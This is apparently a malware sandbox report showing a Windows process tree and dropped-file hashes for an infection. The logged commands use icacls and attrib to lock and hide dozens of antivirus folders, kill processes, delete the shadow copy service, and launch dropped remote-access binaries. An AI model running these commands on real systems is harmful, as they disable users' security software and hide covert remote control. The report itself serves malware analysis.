          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
          PID:5148
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
            PID:5500
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
          PID:4736
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:5156
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
          PID:5268
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
            PID:5684
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
          PID:5580
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5848
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
          PID:6040
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:2268
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
          PID:4400
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
            PID:5788
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
          PID:4584
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:3912
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
          PID:4932
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5456
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
          PID:4052
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
            PID:5908
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
          PID:5464
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
            PID:5212
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
          PID:1220
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
            PID:5448
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
          PID:5600
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:2784
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
          PID:5408
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
            PID:1716
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
          PID:5288
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
            PID:2536
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
          PID:6084
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5752
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
          PID:1892
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
            PID:5644
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
          PID:2164
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:3672
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
          PID:4384
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5228
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
          PID:5632
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
            PID:5764
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
          PID:6136
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
            PID:5248
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
          PID:4632
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:6124
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
          PID:5440
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
            PID:5948
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
          PID:5292
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:5884
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
          PID:5520
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5376
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
          PID:5896
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:1456
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
          PID:4148
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:6012
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
          PID:3140
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
            PID:5244
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
          PID:5232
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4396
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
          PID:5524
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5724
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
          PID:4608
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4232
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
          PID:5152
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5676
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
          PID:5592
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4628
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
          PID:5936
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5284
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
          PID:4700
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5664
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
          PID:812
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
            PID:5508
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
          PID:1784
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:2588
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
          PID:6132
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
            PID:4040
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
          PID:5932
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:5404
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
          PID:4880
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5316
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
          Drops file in Drivers directory
          PID:4856
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
          PID:4752
          • C:\Windows\SysWOW64\timeout.exe
            TIMEOUT /T 5 /NOBREAK
            Delays execution with timeout.exe
            PID:4280
          • C:\Windows\SysWOW64\timeout.exe
            TIMEOUT /T 3 /NOBREAK
            Delays execution with timeout.exe
            PID:5796
          • C:\Windows\SysWOW64\taskkill.exe
            TASKKILL /IM 1.exe /T /F
            Kills process with taskkill
            PID:5940
          • C:\Windows\SysWOW64\taskkill.exe
            TASKKILL /IM P.exe /T /F
            Kills process with taskkill
            PID:4724
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows
            Views/modifies file attributes
            PID:5272
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Intel\BLOCK.bat
          PID:5720
          • C:\Windows\SysWOW64\taskkill.exe
            TASKKILL /IM iediagcmd.exe /T /F
            Kills process with taskkill
            PID:4904
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\windows\speechstracing" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5332
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\windows\speechstracing" /deny system:(OI)(CI)(F)
            PID:5348
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5260
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:1268
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Program Files\360\Total Security"
            Drops file in Program Files directory
            Views/modifies file attributes
            PID:5880
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\360\Total Security" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:2552
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\ProgramData\360TotalSecurity
            Views/modifies file attributes
            PID:2500
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\ProgramData\360safe
            Views/modifies file attributes
            PID:5428
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\360TotalSecurity" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:6056
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\360safe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5816
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\ProgramData\Avira
            Views/modifies file attributes
            PID:6068
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Avira" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:4564
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Package Cache"
            Views/modifies file attributes
            PID:5744
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Package Cache" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5192
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Program Files\ESET"
            Drops file in Program Files directory
            Views/modifies file attributes
            PID:5108
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5692
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\ProgramData\ESET
            Views/modifies file attributes
            PID:5588
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5860
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Program Files\AVAST Software\Avast"
            Drops file in Program Files directory
            Views/modifies file attributes
            PID:5652
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\AVAST Software\Avast" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5352
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Programdata\AVAST Software"
            Views/modifies file attributes
            PID:6044
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\AVAST Software" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5784
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Programdata\Kaspersky Lab"
            Views/modifies file attributes
            PID:5892
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Programdata\Kaspersky Lab Setup Files"
            Views/modifies file attributes
            PID:4712
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Kaspersky Lab" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5584
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5336
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\AdwCleaner"
            Views/modifies file attributes
            PID:5188
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\AdwCleaner" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:6072
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Program Files\Malwarebytes\Anti-Malware"
            Drops file in Program Files directory
            Views/modifies file attributes
            PID:5916
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Malwarebytes\Anti-Malware" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5760
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "c:\programdata\Malwarebytes"
            Views/modifies file attributes
            PID:5432
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\programdata\Malwarebytes" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5132
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\Programdata\MB3Install"
            Views/modifies file attributes
            PID:2896
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\MB3Install" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:2596
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\KVRT_Data"
            Views/modifies file attributes
            PID:5696
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\KVRT_Data" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5416
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Norton"
            Views/modifies file attributes
            PID:1640
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Norton" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5712
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Avg"
            Views/modifies file attributes
            PID:1132
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Avg" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:4588
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\grizzly"
            Views/modifies file attributes
            PID:6032
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\grizzly" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:4320
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Doctor Web"
            Views/modifies file attributes
            PID:6008
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Doctor Web" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:2032
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Indus"
            Views/modifies file attributes
            PID:5472
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Indus" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5452
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\WINDOWS\McMwt"
            Drops file in Windows directory
            Views/modifies file attributes
            PID:5792
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\McMwt" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:748
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\McMwt" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:5748
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\lsass2.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:5780
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\lsass2.exe" /deny System:(OI)(CI)(F)
            PID:2416
          • C:\Windows\SysWOW64\timeout.exe
            timeout 1
            Delays execution with timeout.exe
            PID:2900
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\lsass.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            Modifies file permissions
            PID:1040
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\lsass.exe" /deny System:(OI)(CI)(F)
            PID:5840
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\windows\boy.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
            PID:5768
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\windows\boy.exe" /deny System:(OI)(CI)(F)
            PID:5732
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Microsoft\Intel"
            Views/modifies file attributes
            PID:1796
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Microsoft\Check"
            Views/modifies file attributes
            PID:4560
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S "C:\ProgramData\Microsoft\Temp"
            Views/modifies file attributes
            PID:6064
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete swprv
      PID:3192
      • C:\Windows\SysWOW64\sc.exe
        sc delete swprv
        PID:2584
  • C:\ProgramData\Windows\rutserv.exe
    C:\ProgramData\Windows\rutserv.exe
    Executes dropped EXE
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:360
    • C:\ProgramData\Windows\rfusclient.exe
      C:\ProgramData\Windows\rfusclient.exe
      Executes dropped EXE
      PID:728
      • C:\ProgramData\Windows\rfusclient.exe
        C:\ProgramData\Windows\rfusclient.exe /tray
        Executes dropped EXE
        Suspicious behavior: SetClipboardViewer
        PID:2128
    • C:\ProgramData\Windows\rfusclient.exe
      C:\ProgramData\Windows\rfusclient.exe /tray
      Executes dropped EXE
      PID:2412
  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    Checks SCSI registry key(s)
    Modifies data under HKEY_USERS
    PID:4620
  • \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k networkservice -s TermService
    PID:5040
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
    Loads dropped DLL
    PID:4952
Network
Replay Monitor
00:00 00:00
Downloads
  • C:\Program Files\Common Files\System\iediagcmd.exe

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Program Files\Common Files\System\iexplore.exe

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\ProgramData\Microsoft\Check\Check.txt

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\ProgramData\Microsoft\Intel\BLOCK.bat

    MD5

    c371470817429692a9a0174abbf7cb19

    SHA1

    7aefbafc8775c9c74b445c713924ae63c28ff692

    SHA256

    0f7298daed85812ee47b4dd45a176c3b5007cfafc31a3013354ac904e05861af

    SHA512

    191a5510e0e26809abc94a0d549a9bd3ad7ae19f362fffb5fcaad9fa6c9f63fd4734771a1476f294b820e4ee90762cec916b49ead88ad986ffa59b3db7b171bf

  • C:\ProgramData\Microsoft\Intel\R8.exe

    MD5

    ad95d98c04a3c080df33ed75ad38870f

    SHA1

    abbb43f7b7c86d7917d4582e47245a40ca3f33c0

    SHA256

    40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd

    SHA512

    964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

  • C:\ProgramData\Microsoft\Intel\taskhost.exe

    MD5

    5cf0195be91962de6f58481e15215ddd

    SHA1

    7b2c9fbd487b38806ab09d75cc1db1cde4b6f6f6

    SHA256

    0b452348f0e900c8a09eb41529d2834dc2d113450a084bdb382ace73b9a75e6d

    SHA512

    0df9f28618f3d46fd515f89e4ef3bc93350cdf4f40132ccb903ca55ec8abda4f71f3ae0b29a4d62b4f49b9e0dbf13dba8cf0b6e24584c41c54ddda00898c86d4

  • C:\ProgramData\Microsoft\Intel\taskhost.exe

    MD5

    5cf0195be91962de6f58481e15215ddd

    SHA1

    7b2c9fbd487b38806ab09d75cc1db1cde4b6f6f6

    SHA256

    0b452348f0e900c8a09eb41529d2834dc2d113450a084bdb382ace73b9a75e6d

    SHA512

    0df9f28618f3d46fd515f89e4ef3bc93350cdf4f40132ccb903ca55ec8abda4f71f3ae0b29a4d62b4f49b9e0dbf13dba8cf0b6e24584c41c54ddda00898c86d4

  • C:\ProgramData\Microsoft\Intel\wini.exe

    MD5

    098d7cf555f2bafd4535c8c245cf5e10

    SHA1

    b45daf862b6cbb539988476a0b927a6b8bb55355

    SHA256

    01e043bc0d9a8d53b605b1c7c2b05a5ceab0f8547222d37edd47f7c5ccde191a

    SHA512

    e57b8a48597bf50260c0427468a67b6b9ee5a26fd581644cd53cef5f13dc3e743960c0968cb7e5e5dff186273b75a1c6e133d26ef26320fffabc36b249fbc624

  • C:\ProgramData\Microsoft\Intel\wini.exe

    MD5

    098d7cf555f2bafd4535c8c245cf5e10

    SHA1

    b45daf862b6cbb539988476a0b927a6b8bb55355

    SHA256

    01e043bc0d9a8d53b605b1c7c2b05a5ceab0f8547222d37edd47f7c5ccde191a

    SHA512

    e57b8a48597bf50260c0427468a67b6b9ee5a26fd581644cd53cef5f13dc3e743960c0968cb7e5e5dff186273b75a1c6e133d26ef26320fffabc36b249fbc624

  • C:\ProgramData\RealtekHD\taskhostw.exe

    MD5

    73ca737af2c7168e9c926a27abf7a5b1

    SHA1

    05fd828fd58a64f25682845585f6565b7ca2fdb2

    SHA256

    99dec75b66a048341192c2baae3fe2c47fca801a21ca759bbb127908f97d11e2

    SHA512

    de42f9ef047b888da7379b685a3de7fa0935e3409d9d74bb67ea982dae78c21796985b6e5385875c157d715ee2909f72c419afa6e7c1e8632a8830ee3ea9c172

